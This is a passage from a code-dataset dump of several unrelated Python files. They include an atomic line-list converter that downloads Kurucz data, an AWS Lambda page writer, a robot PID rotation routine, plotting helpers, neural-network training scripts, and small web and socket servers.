=\"gfnew%.4d\" % el[0]\n\t#name =\"hyper%.4d\" % el[0]\n\tNISTname =\"NIST%.4d\" % el[0]\n\n\toutname = \"%s.bin\" % name\n\tpfname = \"%s.pf\" % name\n\tmass = el[2]\n\t\n\tprint(el[0], els, el[1], outname, mass)\n\n\tif(Download == 1):\n\t\t#download file\n\n\t\texists = os.path.isfile(\"%s\" % filename)\n\t\tif(exists == 0):\n\t\t\tcom = \"wget http://kurucz.harvard.edu/linelists/gfnew/%s\" % filename\n\t\t\tprint(com)\n\t\t\tos.system(com)\n\n\t\t#download partition function\n\n\t\texists = os.path.isfile(\"partfn%.4d.dat\" % el[0])\n\t\tif(exists == 0):\n\n\t\t\tcom = \"wget http://kurucz.harvard.edu/atoms/%.4d/partfn%.4d.dat\" % (el[0], el[0])\n\t\t\tprint(com)\n\t\t\tos.system(com)\n\n\t\tif(exists == 0):\n\t\t\texists = os.path.isfile(\"partfn%.4dz.dat\" % el[0])\n\t\t\tcom = \"wget http://kurucz.harvard.edu/atoms/%.4d/partfn%.4dz.dat\" % (el[0], el[0])\n\t\t\tprint(com)\n\t\t\tos.system(com)\n\t\n\n\toutput_file = open(outname,\"wb\")\n\tpf_filename = \"partfn%.4d.dat\" % el[0]\n\n\n\tnumax = 0.0\n\tnl = 0\t\n\tLabelLOld =\"\"\n\tLabelUOld =\"\"\n\tgUPOld = -1\n\tgLowOld = -1\n\tELowOld = -1.0\n\tEUPOld = -1.0\n\n\n\tif(printA == 1):\n\t\tAfile = open(\"gfall_A%02d%02d.dat\" % (Z, I), \"w\")\n\n\twith open(filename) as f:\n\t\tline = f.readlines()\n\n\n\n\n\t\tfor ii in range(len(line)):\n\t\t\tl = line[ii]\n\n\t\t\t#E in cm^-1\n\t\t\t#atomic line list format\n\t\t\tif(Wavenumber == 1):\n\t\t\t\twn = float(l[0:11])\n\t\t\t\twl = 1.0E7/wn\t\t#wavelenght in nm\n\t\t\tif(Wavenumber == 2):\n\t\t\t\twl = float(l[0:11])\t#wavelenght in nm\n\t\t\t\twn = 1.0E7/wl\n\t\t\tif(Wavenumber == 3):\n\t\t\t\twlAir = float(l[0:11])\t#wavelenght in nm\n\n\n\t\t\tloggf = float(l[11:18])\n\t\t\telement = l[18:24]\n\t\t\tELow = float(l[24:36])\n\t\t\tJLow = float(l[36:41])\n\t\t\tLabelL = l[42:52]\n\t\t\tEUP = float(l[52:64])\n\t\t\tJUP = float(l[64:69])\n\t\t\tLabelU = l[70:80]\n\t\t\tGammaR = l[80:86]\n\t\t\tisotope = l[106:109]\n\t\t\thyperFineFraction = l[109:115]\n\t\t\tISOFraction = l[118:124]\n\t\t\thyperShiftL = l[124:129]\n\t\t\thyperShiftU = l[129:134]\n\t\n\t\t\tif(isotope == \" \" or isotope == \"\"):\n\t\t\t\tisotope = \" 0\"\n\t\t\tif(GammaR == \" \" or GammaR == \"\"):\n\t\t\t\tGammaR = \" 0\"\n\t\t\tif(hyperShiftL == \" \" or hyperShiftL == \"\"):\n\t\t\t\thyperShiftL = \" 0\"\n\t\t\tif(hyperShiftU == \" \" or hyperShiftU == \"\"):\n\t\t\t\thyperShiftU = \" 0\"\n\t\t\tif(hyperFineFraction == \" \" or hyperFineFraction == \"\" or len(hyperFineFraction) < 2):\n\t\t\t\thyperFineFraction = \" 0\"\n\t\t\tif(ISOFraction == \" \" or ISOFraction == \"\"):\n\t\t\t\tISOFraction = \" 0\"\n\t\t\t\n\t\t\tGammaR = float(GammaR)\n\t\t\thyperShiftL = float(hyperShiftL)\n\t\t\thyperShiftU = float(hyperShiftU)\n\t\t\thyperFineFraction = float(hyperFineFraction)\n\t\t\tISOFraction = float(ISOFraction)\n\n\t\t\te = 4.80320425E-10 #electron charge in cgs units [statcoulomb = cm^(3/2) g^(1/2) s^-1]\n\t\t\tc = 2.99792458E10 #Speed of light cm/s\n\t\t\tme = 9.1093835611E-28 #mass of electron in g\n\t\t\tNA = 6.0221412927e23\t#Avogadro Constant 1/mol\n\n\n\t\t\tELow = abs(ELow)\n\t\t\tEUP = abs(EUP)\n\n\n\t\t\t#somethimes ELOW is larger than EUP\n\t\t\t\n\t\t\tif(ELow > EUP):\n\t\t\t\tt = EUP\n\t\t\t\tEUP = ELow\n\t\t\t\tELow = t\n\n\t\t\t\tt = JUP\n\t\t\t\tJUP = JLow\n\t\t\t\tJLow = t\n\t\t\t\t\n\t\t\t\tt= hyperShiftU\n\t\t\t\thyperShiftU = hyperShiftL\n\t\t\t\thyperShiftL = t\n\n\t\t\t\tt = LabelU\n\t\t\t\tLabelU = LabelL\n\t\t\t\tLabelL = t\n\t\t\t\t\n\t\t\t\t#if(element == els):\n\t\t\t\t#\tprint(\"swap energies\")\n\t\t\t\t\n\t\t\t#convert air wavelength to vacuum wavelength\n\t\t\t#http://www.astro.uu.se/valdwiki/Air-to-vacuum%20conversion\n\n\t\t\tif(Wavenumber == 3):\n\t\t\t\tif(wlAir > 200):\n\t\t\t\t\twlAir = wlAir * 10 #convert nm to Angstrom\n\t\t\t\t\ts = 10000.0 / wlAir\n\t\t\t\t\tn = 1.0 + 0.00008336624212083 + 0.02408926869968 / (130.1065924522 - s*s) + 0.0001599740894897 / (38.92568793293 - s*s)\n\t\t\t\t\twl = wlAir * n\n\t\t\t\t\twl = wl * 0.1 #convert Angstrom to nm\n\t\t\t\telse:\n\t\t\t\t\twl = wlAir\n\t\t\t\twn = 1.0E7/wl\t\t#wavelenght in nm\n\t\t\t\t\n\n\t\t\tgUP = 2 * JUP + 1\n\t\t\tgLow = 2 * JLow + 1\n\n\t\t\tif(element == els):\n\t\t\t\tA = 8.0 * math.pi * wn * wn * (10.0**loggf) / gUP * math.pi * e * e / (me * c)\n\t\t\t\tgamma = 2.223e13 / (wl * wl)\n\n\t\t\t\tsameLabel = 0\n\t\t\t\tif(LabelL == LabelLOld and LabelU == LabelUOld and gUP == gUPOld and gLow == gLowOld and ELow == ELowOld and EUP == EUPOld):\n\t\t\t\t\tsameLabel = 1\n\t\t\t\t\n\t\t\t\tif(sameLabel == 0):\n\t\t\t\t\tHF = 10.0**hyperFineFraction\n\t\t\t\telse:\n\t\t\t\t\tHF += 10.0**hyperFineFraction\n\n\t\t\t\t\t\n\t\t\t\t'''\t\n\t\t\t\t# use this block to filer out hyperfine splits\n\t\t\t\t###################################\n\t\t\t\thyperFineFraction = 0.0\n\t\t\t\tISOFraction = 0.0\n\t\t\t\twn += 0.001 * hyperShiftL\n\t\t\t\twn -= 0.001 * hyperShiftU\n\t\t\t\thyperShiftU = 0.0\n\t\t\t\thyperShiftL = 0.0\n\t\t\t\tif(sameLabel == 1):\n\t\t\t\t\tcontinue\n\t\t\t\t##################################\n\t\t\t\t'''\n\n\t\t\t\t#print(element, wn, isotope, GammaR, 10.0**GammaR, A, gamma)\n\t\t\t\t#print(element, wn, isotope, ELow, EUP, gLow, gUP, 10.0**loggf, 10.0**hyperFineFraction, 10.0**ISOFraction, LabelL, LabelU, hyperShiftL, hyperShiftU, sameLabel, HF)\n\n\t\t\t\t#if(HF > 1.001):\n\t\t\t\t#\tprint(\"***\", element, wn, isotope, HF)\n\n\n\t\t\t\tLabelLOld = LabelL\n\t\t\t\tLabelUOld = LabelU\n\t\t\t\tgUPOld = gUP\n\t\t\t\tgLowOld = gLow\n\t\t\t\tEUPOld = EUP\n\t\t\t\tELowOld = ELow\n\n\t\t\t\t\n\t\t\t#this must be done after the Hyperfine fraction filtering. (Old value comparison)\n\t\t\tELow += 0.001 * hyperShiftL\n\t\t\tEUP += 0.001 * hyperShiftU\n\n\n\t\t\tisotope = int(isotope)\n\t\t\n\t\t\tif(element == els):\n\t\t\t\tnl = nl + 1\n\n\t\t\t\tnumax = max(numax, wn)\n\n\t\t\t\tS = math.pi * e * e * 10.0**loggf * NA / (c * c * me * mass) * 10.0**hyperFineFraction * 10.0**ISOFraction\n\n\t\t\t\tA = 8.0 * math.pi * wn * wn * 10.0**loggf / gUP * math.pi * e * e / (me * c)\n\t\t\t\n\t\t\t\tif(printA == 1):\n\t\t\t\t\tprint(i, wn, A, ELow, gUP, Z, mass, file = Afile)\t\n\t\t\t\t#print(wn, 1.0E7/wn, loggf, ELow, EUP, JLow, JUP, GammaR, isotope, element, mass, 10.0**GammaR, A, 10.0**hyperFineFraction, 10.0**ISOFraction)\n\n\n\t\t\t\ts = struct.pack('d', wn)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', S)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', ELow)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', 0.0)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', (10**GammaR))\n\t\t\t\toutput_file.write(s)\n\n\tprint(\" Lines:\",nl, end='')\n\n\toutput_file.close()\n\n\tpfile = 0\n\tif(os.path.isfile(pf_filename)):\n\t\t#print(\" \", pf_filename)\n\t\tpf_file = open(pfname,\"w\")\n\t\tT, Q = np.loadtxt(pf_filename, unpack=True, usecols = (2,3), skiprows=3)\n\t\tfor ii in range(len(T)):\n\t\t\tpf_file.write(\"%g %g\\n\" % (T[ii], Q[ii]))\n\t\tpf_file.close()\n\t\tpfile = 1\n\n\telse:\n\t\tprint(\" ------- NIST\")\n\n\tprintCode = 1\n\tif(nl > 0 and printCode == 1):\n\t\tf = open(\"%s.param\" % name,'w')\n\n\t\tprint(\"Database = 30\", file = f)\n\t\tprint(\"Molecule number = %d\" % el[0], file = f)\n\t\tprint(\"Name = %s\" % name, file = f)\n\t\tprint(\"Number of Isotopes = 1\", file = f)\n\t\tprint(\"#Id Abundance Q(296K) g Molar Mass(g) partition file :\", file = f)\n\t\tif(pfile == 1):\n\t\t\tprint(\"0 1.0 0.0 0 %s %s.pf\" % (mass, name), file = f)\n\t\telse:\n\t\t\tprint(\"0 1.0 0.0 0 %s %s.pf\" % (mass, NISTname), file = f)\n\t\tprint(\"Number of columns in partition File = 2\", file = f)\n\t\tprint(\"Number of line/transition files = 1\", file = f)\n\t\tprint(\"Number of lines per file :\", file = f)\n\t\tprint(\"%d\" % nl, file = f)\n\t\tprint(\"Line file limits :\", file = f)\n\t\tprint(\"0\", file = f)\n\t\tprint(\"%d\" % (int(numax)+1), file = f)\n\t\tprint(\"#ExoMol :\", file = f)\n\t\tprint(\"Number of states = 0\", file = f)\n\t\tprint(\"Number of columns in transition files = 0\", file = f)\n\t\tprint(\"Default value of Lorentzian half-width for all lines = 0.0\", file = f)\n\t\tprint(\"Default value of temperature exponent for all lines = 0.0\", file = f)\n\t\tprint(\"Version = %s\" % filename, file = f)\n\n\t\tf.close()\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('-D', '--Download', type=str,\n\t\thelp='Download the files', default = 0)\n\tparser.add_argument('-Z', '--Z', type=int,\n\t\thelp='Z', default = -1)\n\tparser.add_argument('-I', '--I', type=int,\n\t\thelp='I', default = -1)\n\tparser.add_argument('-printA', '--printA', type=int,\n\t\thelp='print A to file', default = 0)\n\n\n\targs = parser.parse_args()\n\tDownload = int(args.Download)\n\tZ = args.Z\n\tI = args.I\n\tprintA = args.printA\n\n\tprint(\"Download: %d, Z:%d, I: %d\" % (Download, Z, I))\n\n\tmain(Download, Z, I, printA)\n\n","sub_path":"Kurucz2.py","file_name":"Kurucz2.py","file_ext":"py","file_size_in_byte":12044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"113710381","text":"import boto3\n\ndef lambda_handler(event, context):\n string = 'Office Hours'+'' +'Professor Humphreys Office Hours
' +'Availability: ' + event['officeHour'] + '
' +'' +'| Sunday | ' + event['sunday'] + ' |
|---|
| Monday | ' + event['monday'] + ' |
' +'| Tuesday | ' + event['tuesday'] + ' |
|---|
| Wednesday | ' + event['wednesday'] + ' |
' + '| Thursday | ' + event['thursday'] + ' |
|---|
| Friday | ' + event['friday'] + ' |
|---|
' +'
| Saturday | ' + event['saturday'] + ' |
|---|
' +'' +'' + '';\n print(string)\n encoded_string = string.encode(\"utf-8\")\n\n bucket_name = \"pa6static\"\n file_name = \"index.html\"\n lambda_path = \"/tmp/\" + file_name\n s3_path = \"100001/20180223/\" + file_name\n \n with open(lambda_path, \"w+\") as f:\n f.write(string)\n\n s3 = boto3.resource(\"s3\")\n s3.Bucket(bucket_name).put_object(Key=s3_path, Body=encoded_string, ContentType='text/html')","sub_path":"officeHours/officeJs/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"623066313","text":"#!/usr/bin/env python3\nfrom pid import PID\nimport os\nimport time\n\n\nclass Rotation:\n def __init__(self, motor_left, motor_right, gyro):\n self.left_motor = motor_left\n self.right_motor = motor_right\n self.gyro = gyro\n\n self.pid = PID(6,0,0, max_val=self.left_motor.max_speed/5, min_val=-self.left_motor.max_speed/5, debug=True)\n os.system(\"cat debug_rotation.log >> debug_rotation.log.old; rm debug_rotation.log\")\n # Povprečje 3 meritev 10x360° (CW): 35+15+27,5 / 3 = 28,83° napake\n # CCW je pribl natančen\n # torej za CW je:\n # 3600+28,83°= 3627.83° realni kot za kok se je obrnu\n # torej na en krog je to 2.883° napake\n # torej je za 1 izmerjeno stopinjo realno 1+2.883/360=1+0,0080083°=1,008008° stopinje nrjene\n \n\n def print_to_file(self, string):\n with open(\"debug_rotation.log\",'a') as f:\n f.write(string)\n\n def __call__(self, abs_degrees):\n self.print_to_file(\"---start-rotation---\\n\")\n self.print_to_file(\"Kp: \"+str(self.pid.Kp)+\",\"+\"Ki: \"+str(self.pid.Ki)+\",\"+\"Kd: \"+str(self.pid.Kd)+\"\\n\")\n num_of_end = 0\n #self.left_motor.ramp_up_sp = 100\n #self.right_motor.ramp_up_sp = 100\n while 1:\n \n\n deg_current = self.gyro.angle()\n if abs(deg_current-abs_degrees)<0.2:\n \n self.left_motor.command, self.right_motor.command=\"stop\",\"stop\"\n \n self.left_motor.speed_sp, self.right_motor.speed_sp = 0,0\n \n \n time.sleep(0.5)\n if abs(self.gyro.angle()-abs_degrees)<0.2:\n self.pid.reset()\n self.print_to_file(\"...end-rotation...\\n\")\n break\n \n \n \n\n \n \n \n err = (abs_degrees-deg_current)\n reg, true_reg = self.pid(err)\n self.print_to_file(str(abs_degrees)+\",\"+str(deg_current)+\",\"+str(err)+\",\"+ str(reg)+\",\"+ str(true_reg)+\"\\n\")\n self.left_motor.speed_sp, self.right_motor.speed_sp = reg, -reg\n self.left_motor.command, self.right_motor.command='run-forever','run-forever'\n \n\n\n","sub_path":"rotation.py","file_name":"rotation.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"135297174","text":"import matplotlib.pyplot as plt\nimport os\n\ndef remove_spines(axes=None, top=False, right=False, left=True, bottom=True):\n \"\"\" Minimize chartjunk by stripping out unnecessary plot borders and axis ticks.\n\n :param axes: If None, gets the current axis through matplotlib.pyplot.gca().\n :param top/right/left/bottom: These toggle whether the corresponding plot border is drawn.\n\n .. _link: https://github.com/cs109/content/blob/caffc21c8f7c758c1884852ed023d29dccea063f/HW2.ipynb\n\n \"\"\"\n ax = axes or plt.gca()\n ax.spines['top'].set_visible(top)\n ax.spines['right'].set_visible(right)\n ax.spines['left'].set_visible(left)\n ax.spines['bottom'].set_visible(bottom)\n \n # turn off all ticks\n ax.yaxis.set_ticks_position('none')\n ax.xaxis.set_ticks_position('none')\n \n # now re-enable visibles\n if top:\n ax.xaxis.tick_top(True)\n if bottom:\n ax.xaxis.tick_bottom()\n if left:\n ax.yaxis.tick_left()\n if right:\n ax.yaxis.tick_right()\n\ndef save_figure(fig, filename, folder='../figures', exts=['pdf', 'png'], **kwargs):\n \"\"\" Save a matplotlib figure.\n\n :param fig: The matplotlib figure to save.\n :param filename: The name of the saved file. \"-[n]\" will be appended to this name, where n is the smallest number that makes the name unique.\n :param folder: Save the file to this folder.\n :param exts: Save the file as these file types. Default is 'pdf'.\n :param kwargs: Keyword arguments for plt.savefig(), e.g. additional_artists.\n\n \"\"\"\n if not os.path.exists(folder):\n os.makedirs(folder)\n paths = []\n for ext in exts:\n i = 0\n while True:\n path = '{}/{}-{:d}.{}'.format(folder, filename, i, ext)\n if not os.path.exists(path):\n break\n i += 1\n plt.savefig(path, **kwargs)\n paths.append(path)\n return paths\n\ndef get_boxplot_style(color, lw=2, alpha=1.0, width=0.5):\n \"\"\" Get keyword arguments for a boxplot style.\n \n :param color: Color of the boxes, whiskers, median, caps, and fliers\n :param lw: Line width\n :param alpha: Opacity\n :param width: Width of the box\n\n\n :return: A dictionary of keyword arguments for use with matplotlib.pyplot.boxplot().\n\n \"\"\"\n return dict(\n sym=None, \n widths=width, \n whis='range',\n boxprops=dict(color=color, alpha=alpha, lw=lw),\n whiskerprops=dict(color=color, alpha=alpha, lw=lw),\n medianprops=dict(color=color, alpha=alpha, lw=lw),\n capprops=dict(color=color,alpha=alpha, lw=lw),\n flierprops=dict(color=color, alpha=alpha, marker='o', markersize=7)\n )\n\ndef get_errorbar_style(color, lw=1.5):\n \"\"\" Get keyword arguments for a boxplot style.\n \n :param color: Color of the error bars\n :param lw: Line width\n\n :return: A dictionary of keyword arguments for use with matplotlib.pyplot.errorbar().\n\n \"\"\"\n return dict(\n marker='s', \n ls='none', \n lw=lw, \n capsize=3, \n capthick=1, \n ecolor=color, \n color=color\n )\n\ndef style_violin(violin_parts, violin_color, stem_color):\n for key, part in violin_parts.iteritems():\n if key == 'bodies':\n for subpart in violin_parts['bodies']:\n subpart.set_facecolor(c=violin_color)\n subpart.set_edgecolor(c=violin_color)\n else:\n part.set_facecolor(stem_color)\n part.set_edgecolor(stem_color)","sub_path":"notebooks/pneumodel/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"88987954","text":"\nimport numpy as np\nimport os\nimport matlab.engine\n\nfrom sepia.SepiaDistCov import SepiaDistCov\nfrom test.util import timeit\n\n\nscript_path = os.path.dirname(os.path.realpath(__file__))\n\npu = 30\nn1 = 700\nn2 = 500\nlams = 10.\nlamz = 1.\nbeta = np.exp(-0.25 * np.linspace(0, 1, pu))[:, None]\nX1 = np.random.uniform(0, 1, (n1, pu))\nX2 = np.random.uniform(0, 1, (n2, pu))\nnreps = 100\n\nprint('\\nMATLAB\\n')\ntry:\n eng = matlab.engine.start_matlab()\n eng.cd(script_path)\n eng.addpath('matlab/', nargout=0)\n eng.profile_dist_cov(n1, n2, lams, lamz, pu, nreps, nargout=0)\n eng.quit()\nexcept Exception as e:\n print(e)\n print('make sure matlab.engine installed')\n\n@timeit\ndef init_distcov_square():\n for i in range(nreps):\n _ = SepiaDistCov(X1)\n\nsd = SepiaDistCov(X1)\n@timeit\ndef calc_cov_square():\n for i in range(nreps):\n _ = sd.compute_cov_mat(beta, lamz, lams)\n\n@timeit\ndef init_distcov_rect():\n for i in range(nreps):\n _ = SepiaDistCov(X1, X2)\n\nsd = SepiaDistCov(X1, X2)\n@timeit\ndef calc_cov_rect():\n for i in range(nreps):\n _ = sd.compute_cov_mat(beta, lamz, lams)\n\nprint('\\nPYTHON\\n')\n\nprint('create square dist obj x%d' % nreps)\ninit_distcov_square()\n\nprint('calc square cov x%d' % nreps)\ncalc_cov_square()\n\nprint('create rect dist obj x%d' % nreps)\ninit_distcov_rect()\n\nprint('calc rect cov x%d' % nreps)\ncalc_cov_rect()\n","sub_path":"dev/dev_test/profile_dist_cov.py","file_name":"profile_dist_cov.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"469304468","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/2/10/0010 1:31\n# @Author : Mat\n\n# 该文件是用来管理第三方的插件的\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nmodels = SQLAlchemy()\nmigrate = Migrate()\n\ndef init_ext(app):\n '''\n 专门用于初始化扩展库文件 初始化第三方的库文件\n :param app:\n :return:\n '''\n models.init_app(app=app)\n migrate.init_app(app, models) # 初始化\n","sub_path":"flask_demo_view/App/ext.py","file_name":"ext.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"522878180","text":"# -*- coding:utf-8 -*-\n# Author : 'SAM'\n# CreateTime : '2020/12/7 10:18'\n# file : 'sam.py'\n# Summary : ''\n\n\nimport socket\n\n\ndef main():\n # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s = socket.socket() # 使用默认值,跟上面一样\n s.connect(('192.168.1.141', 8080))\n print(s.recv(1024).decode('utf-8'))\n for data in [b'sam', b'turentu', b'admin']:\n s.send(data)\n print(s.recv(1024).decode('utf-8'))\n s.send(b'exit')\n s.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"SAM/sam_celery/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"49994988","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nScripts for training a mobile network.\n\"\"\"\n\nimport tensorflow as tf\nimport network.ssdConf as ssdConf\nimport common.dataset as dt\nimport network.ssdNet as ssdNet\nimport network.mobileNet as mobileNet\nimport common.utils as utils\nimport common.config as conf\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\nimport tensorlayer as tl\nimport tensorflow.contrib.slim.nets as nets\n\ndef main(_):\n \"\"\"\n Main script for training.\n :return: None.\n \"\"\"\n\n # Create feature extractor.\n gconf = conf.loadTrainConf()\n # mobilenet = mobileNet.MobileNet(gconf)\n\n # Prepaire data\n dataset = dt.DataSet(path=gconf['dataset_path'],\n batchsize=gconf['batch_size'],\n class_num=gconf['class_num'])\n\n img_name_batch, img_batch, sizes_batch, class_id_batch, box_num_batch, labels_batch, bboxes_batch = dataset.getNext()\n labels_batch = tf.one_hot(class_id_batch, gconf['class_num'] + 1)\n labels_batch = labels_batch[:, 1:]\n dataset_itr = dataset._itr\n\n # Predict labels\n # img_batch = tf.cast(input_imgs, tf.float32)\n input_imgs = tf.placeholder(tf.float32, [None, gconf['input_size'], gconf['input_size'], 3])\n alexnet, _ = nets.resnet_v2.resnet_v2_50(input_imgs, num_classes=20, is_training =True)\n logits = alexnet\n\n # Compute loss\n labels = tf.placeholder(tf.float32, [None, gconf['class_num']])\n tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=logits)\n loss = tf.losses.get_total_loss()\n tf.summary.scalar('loss', loss)\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=gconf['learning_rate'])\n train_op = optimizer.minimize(loss)\n\n correct_prediction = tf.equal(tf.argmax(logits, axis=1), tf.argmax(labels, axis=1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('train_acc', accuracy)\n\n summary = tf.summary.merge_all()\n init_op = tf.global_variables_initializer()\n\n\n with open('/home/autel/libs/ssd-tensorflow-ljanyst/pascal-voc/trainval/VOCdevkit/VOC2007/classes.json') as label_name_file:\n class_dict = json.load(label_name_file)\n\n step_cnt = 0\n with tf.Session() as sess:\n tb_log_writer = tf.summary.FileWriter(gconf['log_dir'], sess.graph)\n\n sess.run(init_op)\n\n for _ in range(gconf['epoch_num']):\n sess.run(dataset_itr.initializer)\n\n while True:\n step_cnt = step_cnt + 1\n try:\n # train\n imgs_input, labels_input = sess.run([img_batch, labels_batch])\n\n\n # lab_pred, lab_batch = sess.run([labels_pred, class_id_batch], feed_dict={input_imgs:imgs_input,\n # labels: labels_input});\n # print(lab_pred, lab_batch)\n # exit(0)\n #\n # for img, class_onehot in zip(imgs_input, labels_input):\n # utils.visulizeClass(img, class_onehot, class_dict, hold=True)\n # plt.waitforbuttonpress()\n\n summary_val, loss_val, train_acc, _ = sess.run([summary, loss, accuracy, train_op], feed_dict={input_imgs:imgs_input,\n labels: labels_input})\n\n if step_cnt % gconf['log_step'] == 0:\n tb_log_writer.add_summary(summary_val, step_cnt)\n print('Step %d, loss: %f, train_acc: %f'%(step_cnt, loss_val, train_acc))\n except tf.errors.OutOfRangeError:\n # log statistics\n # break\n break\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"train_resnet.py","file_name":"train_resnet.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"540568608","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.compat.v1.nn import rnn_cell\n\n\nclass MyModel:\n\n def __init__(self, batch_size, time_steps, input_size, output_size, hidden_unites, num_layers, is_train=True):\n\n self.batch_size = batch_size\n self.time_steps = time_steps\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_unites = hidden_unites\n self.num_layers = num_layers\n self.is_train = is_train\n self.model_path = './model/model.ckpt'\n\n def forward(self, input_tensor):\n lstm_cell_list = [rnn_cell.BasicLSTMCell(self.hidden_unites) for _ in range(self.num_layers)]\n cell = rnn_cell.MultiRNNCell(lstm_cell_list)\n h, state = tf.nn.dynamic_rnn(cell, input_tensor, dtype=tf.float32)\n out = h[:, -1, :]\n predict = tf.contrib.layers.fully_connected(out, num_outputs=1, activation_fn=tf.nn.tanh)\n return predict\n\n def train(self, X, y):\n\n nums_train = len(X)\n x = np.array(X).swapaxes(1, 2) # (batch_size, time_step, length)\n\n inputs = tf.placeholder(tf.float32, shape=(None, self.time_steps, self.input_size), name='x-input')\n outputs = tf.placeholder(tf.float32, shape=(None, self.output_size), name='y-input')\n\n predict = self.forward(inputs)\n loss = tf.losses.mean_squared_error(labels=outputs, predictions=predict)\n\n train_op = tf.train.AdamOptimizer(0.0001).minimize(loss)\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(3000):\n start = (i * self.batch_size) % self.batch_size\n end = min(start + self.batch_size, nums_train)\n _, loss_value = sess.run([train_op, loss], feed_dict={inputs: x[start:end], outputs: y[start:end]})\n if i % 500 == 0:\n saver.save(sess, self.model_path)\n print('After %d train steps, train loss is %g' % (i, loss_value))\n\n def predict(self, X, y):\n x = np.array(X).swapaxes(1, 2)\n with tf.Graph().as_default() as g:\n inputs = tf.placeholder(tf.float32, shape=(None, self.time_steps, self.input_size), name='x-input')\n outputs = tf.placeholder(tf.float32, shape=(None, self.output_size), name='y-input')\n predict = self.forward(inputs)\n mse = tf.losses.mean_squared_error(outputs, predict)\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n saver.restore(sess, self.model_path)\n mse, res = sess.run([mse, predict], feed_dict={inputs: x, outputs: y})\n print(\"mse: %g\" % mse)\n return res\n\n\n\n\n","sub_path":"Learning of TensorFlow 1.x/rnn_demo/my_model.py","file_name":"my_model.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"353692840","text":"import basics\n\nimport users\n\nModels = basics.schemas.group( users.schema )\nBlueprints = basics.blueprints.crud_group( users.blueprint )\n#Database = basics.sanic.Postgres(user = 'username', password = 'password', database = 'mewb', host = '127.0.0.1', port = 5432)\nDatabase = basics.sanic.Sqlite('database_test.db')\n\n\nfrom sanic import Sanic\nfrom sanic import response\n\napp = Sanic(\"hello_example\")\n\n\napi_handler = Database.handler( blueprints=Blueprints, models=Models )\napp.register_listener(Database.setup, 'before_server_start')\n\n\n@app.post(\"/\")\nasync def root(request):\n payload = await api_handler(request.app, request.json)\n return response.json( payload )\n\n\n@app.get(\"/info\")\nasync def info(request):\n payload = {\n \"models\" : Models.keys(),\n \"urls\" : Blueprints.keys(),\n \"info\" : { k:v.form.meta._asdict() for k,v in Models.items() },\n }\n return response.json( payload )\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8085)\n","sub_path":"examples/app/app_sanic.py","file_name":"app_sanic.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"131881591","text":"import sys\r\nimport socket\r\n\r\n\r\nclass GameServer:\r\n def __init__(self, address, port, data_size):\r\n self.data_size = data_size\r\n self._createTcpIpSocket()\r\n self._bindSocketToThePort(address, port)\r\n self.connection = None\r\n\r\n def _CreateTcpIpSocket(self):\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n def HandleConnection(self):\r\n self.sock.listen(1)\r\n connection, client_address = self.sock.accept()\r\n # while True:\r\n # data = connection.recv(self.data_size)\r\n # if data:\r\n # print(data)\r\n # if data == \"END\":\r\n # break\r\n # connection.send(data)\r\n\r\n def _BindSocketToPort(self, address, port):\r\n server_address = (address, port)\r\n print('bind to %s port %s' % server_address)\r\n self.sock.bind(server_address)\r\n\r\nif __name__ == \"__main__\":\r\n host = 'localhost'\r\n port = 50001\r\n data_size = 1024\r\n server = MyEchoServer(host,port, data_size)\r\n server.HandleConnection()\r\n\r\n\r\n\r\n","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
